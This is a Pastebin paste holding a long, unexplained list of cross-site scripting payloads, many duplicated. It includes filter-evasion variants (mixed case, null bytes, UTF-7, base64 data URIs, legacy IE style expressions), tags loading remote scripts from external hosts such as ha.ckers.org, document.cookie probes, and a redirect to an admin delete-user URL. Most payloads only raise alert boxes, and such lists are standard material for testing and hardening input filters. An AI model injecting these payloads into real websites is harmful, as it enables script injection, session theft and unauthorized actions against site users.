Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- %22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E"
- ';alert(String.fromCharCode(888383))//\';alert(String.fromCharCode(888383))//\";alert(String.fromCharCode(888383))//\";alert(String.fromCharCode(888383))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(888383))</SCRIPT>"
- '';!--\"<XSS>=&{()}"
- <IMG SRC=\"javascript:alert('XSS');\">"
- <IMG SRC=javascript:alert('XSS')>"
- <IMG SRC=JaVaScRiPt:alert('XSS')>"
- <IMG SRC=javascript:alert("XSS")>"
- <IMG SRC=`javascript:alert(\"is this 'XSS'\")`>"
- <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">"
- <IMG SRC=javascript:alert(String.fromCharCode(888383))>"
- <IMG SRC=\"jav	ascript:alert('XSS');\">"
- <IMG SRC=\"jav
ascript:alert('XSS');\">"
- <IMG SRC=\"jav
ascript:alert('XSS');\">"
- perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out"
- perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out"
- <IMG SRC=\" javascript:alert('XSS');\">"
- <BODY onload!#$%&()*~+-_.:;?@[/|\]^`=alert(\"XSS\")>"
- <<SCRIPT>alert(\"XSS\");//<</SCRIPT>"
- <IMG SRC=\"javascript:alert('XSS')\""
- <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>"
- \";alert('XSS');//"
- </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>"
- <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">"
- <BODY BACKGROUND=\"javascript:alert('XSS')\">"
- <BODY ONLOAD=alert('XSS')>"
- <IMG DYNSRC=\"javascript:alert('XSS')\">"
- <IMG LOWSRC=\"javascript:alert('XSS')\">"
- <BGSOUND SRC=\"javascript:alert('XSS');\">"
- <BR SIZE=\"&{alert('XSS')}\">"
- <LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">"
- <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS"
- <IMG SRC='vbscript:msgbox(\"XSS\")'>"
- <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">"
- <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">"
- <IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>"
- <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>"
- <TABLE BACKGROUND=\"javascript:alert('XSS')\">"
- <TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">"
- <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">"
- <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">"
- <DIV STYLE=\"width: expression(alert('XSS'));\">"
- <STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>"
- <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">"
- <XSS STYLE=\"xss:expression(alert('XSS'))\">"
- <STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>"
- <BASE HREF=\"javascript:alert('XSS');//\">"
- <? echo('<SCR)'; echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>"
- <A HREF=\"http://1113982867/\">XSS</A>"
- <A HREF=\"http://www.google.com./\">XSS</A>"
- %22%3Cscript%3Ealert%28%27XSSYA%27%29%3C%2Fscript%3E"
- 1%253CScRiPt%2520%253Eprompt%28962477%29%253C%2fsCripT%253E"
- <script>alert('xssya')</script>"
- %3CScRipt%3EALeRt(%27xssya%27)%3B%3C%2FsCRipT%3E"
- <scr<script>ipt>alert(1)</scr<script>ipt>"
- %3cscript%3ealert(%27XSSYA%27)%3c%2fscript%3e"
- %3cbody%2fonhashchange%3dalert(1)%3e%3ca+href%3d%23%3eclickit"
- %3cimg+src%3dx+onerror%3dprompt(1)%3b%3e%0d%0a"
- %3cvideo+src%3dx+onerror%3dprompt(1)%3b%3e"
- <iframesrc=\"javascript:alert(2)\">"
- <iframe/src=\"data:text/html;	base64
PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">"
- <form action=\"Javascript:alert(1)\"><input type=submit>"
- <isindex action=data:text/html type=image>"
- <object data=\"data:text/html;base64PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=\">"
- <svg/onload=prompt(1);>"
- <marquee/onstart=confirm(2)>/"
- <body onload=prompt(1);>"
- <q/oncut=open()>"
- <a onmouseover=location=�javascript:alert(1)>click"
- <svg><script>alert(/1/)</script>"
- </script><script>alert(1)</script>"
- <scri%00pt>alert(1);</scri%00pt>"
- <scri%00pt>confirm(0);</scri%00pt>"
- 5\x72\x74\x28\x30\x29\x3B'>rhainfosec"
- <isindex action=j	a	vas	c	r	ipt:alert(1) type=image>"
- <marquee/onstart=confirm(2)>"
- <A HREF=\"http://www.google.com./\">XSS</A>"
- <svg/onload=prompt(1);>
- <script>alert(123)</script>
- <script>alert("hellox worldss");</script>
- javascript:alert("hellox worldss")
- <img src="javascript:alert('XSS');">
- <img src=javascript:alert("XSS")>
- <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
- <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
- <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <<SCRIPT>alert("XSS");//<</SCRIPT>
- ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
- <script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
- <script>alert("XSS");</script>&search=1
- 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
- <h1><font color=blue>hellox worldss</h1>
- <BODY ONLOAD=alert('hellox worldss')>
- <input onfocus=write(XSS) autofocus>
- <input onblur=write(XSS) autofocus><input autofocus>
- <body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
- <form><button formaction="javascript:alert(XSS)">lol
- <!--<img src="--><img src=x onerror=alert(XSS)//">
- <![><img src="]><img src=x onerror=alert(XSS)//">
- <style><img src="</style><img src=x onerror=alert(XSS)//">
- <? foo="><script>alert(1)</script>">
- <! foo="><script>alert(1)</script>">
- </ foo="><script>alert(1)</script>">
- <? foo="><x foo='?><script>alert(1)</script>'>">
- <! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
- <% foo><x foo="%><script>alert(123)</script>">
- <div style="font-family:'foo ;color:red;';">LOL
- LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
- <script>({0:#0=alert/#0#/#0#(0)})</script>
- <svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
- <SCRIPT>alert(/XSS/.source)</SCRIPT>
- \\";alert('XSS');//
- </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
- <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
- <BODY BACKGROUND=\"javascript:alert('XSS')\">
- <BODY ONLOAD=alert('XSS')>
- <IMG DYNSRC=\"javascript:alert('XSS')\">
- <IMG LOWSRC=\"javascript:alert('XSS')\">
- <BGSOUND SRC=\"javascript:alert('XSS');\">
- <BR SIZE=\"&{alert('XSS')}\">
- <LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>
- <LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
- <LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">
- <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
- <META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">
- <STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>
- <XSS STYLE=\"behavior: url(xss.htc);\">
- <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
- <IMG SRC='vbscript:msgbox(\"XSS\")'>
- <IMG SRC=\"mocha:[code]\">
- <IMG SRC=\"livescript:[code]\">
- �scriptualert(EXSSE)�/scriptu
- <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
- <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">
- <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"
- <IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
- <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
- <TABLE BACKGROUND=\"javascript:alert('XSS')\">
- <TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
- <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
- <DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
- <DIV STYLE=\"width: expression(alert('XSS'));\">
- <STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>
- <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
- <XSS STYLE=\"xss:expression(alert('XSS'))\">
- exp/*<A STYLE='no\xss:noxss(\"*//*\");
- xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>
- <STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>
- <STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>
- <STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>
- <!--[if gte IE 4]>
- <SCRIPT>alert('XSS');</SCRIPT>
- <![endif]-->
- <BASE HREF=\"javascript:alert('XSS');//\">
- <OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
- <EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>
- <EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>
- a=\"get\";
- b=\"URL(\\"\";
- c=\"javascript:\";
- d=\"alert('XSS');\\")\";
- eval(a+b+c+d);
- <HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>
- <XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>
- </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>
- <SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>
- <XML SRC=\"xsstest.xml\" ID=I></XML>
- <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <HTML><BODY>
- <?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">
- <?import namespace=\"t\" implementation=\"#default#time2\">
- <t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\">
- </BODY></HTML>
- <SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>
- <!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->
- <? echo('<SCR)';
- echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
- <IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
- Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
- <META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
- <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
- <SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
- <SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
- <SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
- <SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
- <SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
- <SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
- <SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
- <A HREF=\"http://66.102.7.147/\">XSS</A>
- <A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>
- <A HREF=\"http://1113982867/\">XSS</A>
- <A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>
- <A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
- <A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>
- <A HREF=\"//www.google.com/\">XSS</A>
- <A HREF=\"//google\">XSS</A>
- <A HREF=\"http://ha.ckers.org@google\">XSS</A>
- <A HREF=\"http://google:ha.ckers.org\">XSS</A>
- <A HREF=\"http://google.com/\">XSS</A>
- <A HREF=\"http://www.google.com./\">XSS</A>
- <A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>
- <A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>
- <
- %3C
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- <
- \x3c
- \x3C
- \u003c
- \u003C
- <iframe src=http://ha.ckers.org/scriptlet.html>
- <IMG SRC=\"javascript:alert('XSS')\"
- <SCRIPT SRC=//ha.ckers.org/.js>
- <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
- <<SCRIPT>alert(\"XSS\");//<</SCRIPT>
- <SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>
- <SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
- <IMG SRC=\" javascript:alert('XSS');\">
- perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out
- perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out
- <IMG SRC=\"jav
ascript:alert('XSS');\">
- <IMG SRC=\"jav
ascript:alert('XSS');\">
- <IMG SRC=\"jav	ascript:alert('XSS');\">
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
- <IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
- <IMG SRC=javascript:alert("XSS")>
- <IMG SRC=JaVaScRiPt:alert('XSS')>
- <IMG SRC=\"javascript:alert('XSS');\">
- <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
- '';!--\"<XSS>=&{()}
- ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- '';!--"<XSS>=&{()}
- <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
- <IMG SRC="javascript:alert('XSS');">
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=javascrscriptipt:alert('XSS')>
- <IMG SRC=JaVaScRiPt:alert('XSS')>
- <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
- <IMG SRC="  javascript:alert('XSS');">
- <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
- \";alert('XSS');//
- </TITLE><SCRIPT>alert("XSS");</SCRIPT>
- �script�alert(�XSS�)�/script�
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
- <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
- <TABLE BACKGROUND="javascript:alert('XSS')">
- <TABLE><TD BACKGROUND="javascript:alert('XSS')">
- <DIV STYLE="background-image: url(javascript:alert('XSS'))">
- <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
- <DIV STYLE="width: expression(alert('XSS'));">
- <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
- <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
- <XSS STYLE="xss:expression(alert('XSS'))">
- exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
- <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
- a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
- <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
- <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></BODY></HTML>
- <form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION
- <form><button formaction="javascript:alert(123)">crosssitespt
- <frameset onload=alert(123)>
- <!--<img src="--><img src=x onerror=alert(123)//">
- <style><img src="</style><img src=x onerror=alert(123)//">
- <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
- <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
- <embed src="javascript:alert(1)">
- <script>({0:#0=alert/#0#/#0#(123)})</script>
- <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script>
- <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
- <script src="#">{alert(1)}</script>;1
- <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
- <svg xmlns="#"><script>alert(1)</script></svg>
- <svg onload="javascript:alert(123)" xmlns="#"></svg>
- <iframe xmlns="#" src="javascript:alert(1)"></iframe>
- +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
- %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
- %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
- %253cscript%253ealert(document.cookie)%253c/script%253e
- �><s�%2b�cript>alert(document.cookie)</script>
- �><ScRiPt>alert(document.cookie)</script>
- �><<script>alert(document.cookie);//<</script>
- foo<script>alert(document.cookie)</script>
- <scr<script>ipt>alert(document.cookie)</scr</script>ipt>
- %22/%3E%3CBODY%20onload=�document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)�%3E
- �; alert(document.cookie); var foo=�
- foo\�; alert(document.cookie);//�;
- </script><script >alert(document.cookie)</script>
- <img src=asdf onerror=alert(document.cookie)>
- <BODY ONLOAD=alert(�XSS�)>
- <script>alert(1)</script>
- "><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
- <video src=1 onerror=alert(1)>
- <audio src=1 onerror=alert(1)>
- <meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
- <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
- <SCRIPT>document.cookie=true;</SCRIPT>
- <IMG SRC="jav ascript:document.cookie=true;">
- <IMG SRC="javascript:document.cookie=true;">
- <IMG SRC=" javascript:document.cookie=true;">
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
- <SCRIPT>document.cookie=true;//<</SCRIPT>
- <SCRIPT <B>document.cookie=true;</SCRIPT>
- <iframe src="javascript:document.cookie=true;>
- <SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
- </TITLE><SCRIPT>document.cookie=true;</SCRIPT>
- <INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
- <BODY BACKGROUND="javascript:document.cookie=true;">
- <BODY ONLOAD=document.cookie=true;>
- <IMG DYNSRC="javascript:document.cookie=true;">
- <IMG LOWSRC="javascript:document.cookie=true;">
- <BGSOUND SRC="javascript:document.cookie=true;">
- <BR SIZE="&{document.cookie=true}">
- <LAYER SRC="javascript:document.cookie=true;"></LAYER>
- <LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
- <STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
- �script�document.cookie=true;�/script�
- <IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
- <FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
- <TABLE BACKGROUND="javascript:document.cookie=true;">
- <TABLE><TD BACKGROUND="javascript:document.cookie=true;">
- <DIV STYLE="background-image: url(javascript:document.cookie=true;)">
- <DIV STYLE="background-image: url(javascript:document.cookie=true;)">
- <DIV STYLE="width: expression(document.cookie=true);">
- <STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
- <IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
- <CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
- exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'>
- <STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
- <STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
- <STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
- <BASE HREF="javascript:document.cookie=true;//">
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
- <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
- <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
- <? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
- <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
- <a href="javascript#document.cookie=true;">
- <div onmouseover="document.cookie=true;">
- <img src="javascript:document.cookie=true;">
- <img dynsrc="javascript:document.cookie=true;">
- <input type="image" dynsrc="javascript:document.cookie=true;">
- <bgsound src="javascript:document.cookie=true;">
- &<script>document.cookie=true;</script>
- &{document.cookie=true;};
- <img src=&{document.cookie=true;};>
- <link rel="stylesheet" href="javascript:document.cookie=true;">
- <img src="mocha:document.cookie=true;">
- <img src="livescript:document.cookie=true;">
- <a href="about:<script>document.cookie=true;</script>">
- <body onload="document.cookie=true;">
- <div style="background-image: url(javascript:document.cookie=true;);">
- <div style="behaviour: url([link to code]);">
- <div style="binding: url([link to code]);">
- <div style="width: expression(document.cookie=true;);">
- <style type="text/javascript">document.cookie=true;</style>
- <object classid="clsid:..." codebase="javascript:document.cookie=true;">
- <style><!--</style><script>document.cookie=true;//--></script>
- <<script>document.cookie=true;</script>
- <script>document.cookie=true;//--></script>
- <!-- -- --><script>document.cookie=true;</script><!-- -- -->
- <img src="blah"onmouseover="document.cookie=true;">
- <img src="blah>" onmouseover="document.cookie=true;">
- <xml src="javascript:document.cookie=true;">
- <xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
- <div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
- >"<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
- >"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
- >"<SCRIPT>document.cookie=true;</SCRIPT>
- >"<IMG SRC="jav ascript:document.cookie=true;">
- >"<IMG SRC="javascript:document.cookie=true;">
- >"<IMG SRC=" javascript:document.cookie=true;">
- >"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
- >"<SCRIPT>document.cookie=true;//<</SCRIPT>
- >"<SCRIPT <B>document.cookie=true;</SCRIPT>
- >"<iframe src="javascript:document.cookie=true;>
- >"<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
- >"</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
- >"<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
- >"<BODY BACKGROUND="javascript:document.cookie=true;">
- >"<BODY ONLOAD=document.cookie=true;>
- >"<IMG DYNSRC="javascript:document.cookie=true;">
- >"<IMG LOWSRC="javascript:document.cookie=true;">
- >"<BGSOUND SRC="javascript:document.cookie=true;">
- >"<BR SIZE="&{document.cookie=true}">
- >"<LAYER SRC="javascript:document.cookie=true;"></LAYER>
- >"<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
- >"<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
- >"�script�document.cookie=true;�/script�
